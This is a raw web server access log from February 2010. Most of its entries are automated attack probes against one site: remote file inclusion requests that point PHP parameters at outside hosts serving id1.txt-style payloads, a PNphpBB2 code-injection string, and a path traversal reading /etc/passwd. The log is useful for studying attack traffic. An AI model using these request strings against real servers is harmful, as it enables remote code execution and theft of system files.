208.93.149.176 - - [11/Feb/2010:05:41:05 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:41:08 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:41:08 -0800] "GET /orange_g/forum/viewtopic.php?p=28069 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:09 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:09 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:09 -0800] "GET /logs/access_100117.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:41:10 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:41:11 -0800] "GET /logs/access_100127.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:41:11 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:41:11 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:41:13 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:41:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:41:16 -0800] "GET /logs/access_100129.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:41:18 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [11/Feb/2010:05:41:24 -0800] "GET /logs/access_100130.log//ggambo7002_board/comment_modify.php?dir=http://www.moneylike.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:47 -0800] "GET /logs/access_100114.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:52 -0800] "GET /logs/access_100114.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:05:41:56 -0800] "GET /logs/access_100114.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:42:00 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:42:00 -0800] "GET /logs/access_100129.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:42:00 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.79.47.125 - - [11/Feb/2010:05:42:00 -0800] "GET /logs/access_100127.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:42:18 -0800] "GET /logs/access_100109.log%20%20/modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:21 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:21 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:21 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:23 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:42:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:42:35 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:42:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:42:40 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:42:40 -0800] "GET /logs/access_100113.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:02 -0800] "GET /logs/access_091223.log//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:02 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:02 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:03 -0800] "GET /logs/access_091223.log//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:03 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:04 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:05 -0800] "GET /logs/access_091223.log//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:05 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:05 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:05 -0800] "GET /logs/access_091223.log//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:05 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:05:43:06 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:05:43:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:05:43:12 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [11/Feb/2010:05:43:12 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:43:48 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:43:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:43:48 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:44:49 -0800] "GET /logs/access_100122.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:05:45:20 -0800] "GET /logs/access_100119.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:48:28 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:48:28 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:48:29 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:21 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:52 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:53 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:49:55 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:05:50:05 -0800] "GET /include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:05:50:05 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [11/Feb/2010:05:50:05 -0800] "GET /logs/access_100108.log//include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:50:43 -0800] "GET /logs/access_100125.log/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:50:43 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:50:43 -0800] "GET /logs/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:51:03 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:51:22 -0800] "GET /logs/access_100125.log/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:51:22 -0800] "GET /index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:51:23 -0800] "GET /logs/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:51:36 -0800] "GET /logs/access_100114.log/modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:51:58 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:51:58 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:05:51:58 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:52:08 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:52:12 -0800] "GET /logs/access_100201.log/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:05:52:29 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:52:34 -0800] "GET /read_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:52:34 -0800] "GET /logs/access_100112.log//read_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [11/Feb/2010:05:52:35 -0800] "GET /logs//read_comment.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [11/Feb/2010:05:52:35 -0800] "GET /logs/access_100201.log/index.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:52:43 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:52:47 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [11/Feb/2010:05:52:51 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:53:00 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:53:00 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:05:53:00 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb.root_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [11/Feb/2010:05:53:15 -0800] "GET /logs/access_100108.log//include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [11/Feb/2010:05:53:15 -0800] "GET /include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.19.42.184 - - [11/Feb/2010:05:53:15 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:53:31 -0800] "GET /logs/access_100109.log/modules/My_eGallery/public/displayCategory.php?basepath=http://foisonseafood.com/include/build/editor/editor-beta.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:55 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:56 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:56 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:54:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [11/Feb/2010:05:56:37 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:56:37 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:56:37 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:56:37 -0800] "GET /style/imagehover.js HTTP/1.1" 200 1410 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "puaga.com"
78.188.102.171 - - [11/Feb/2010:05:56:38 -0800] "GET /style/5.style.css HTTP/1.1" 200 2407 "http://puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20100104 SeaMonkey/2.0.2" "www.puaga.com"
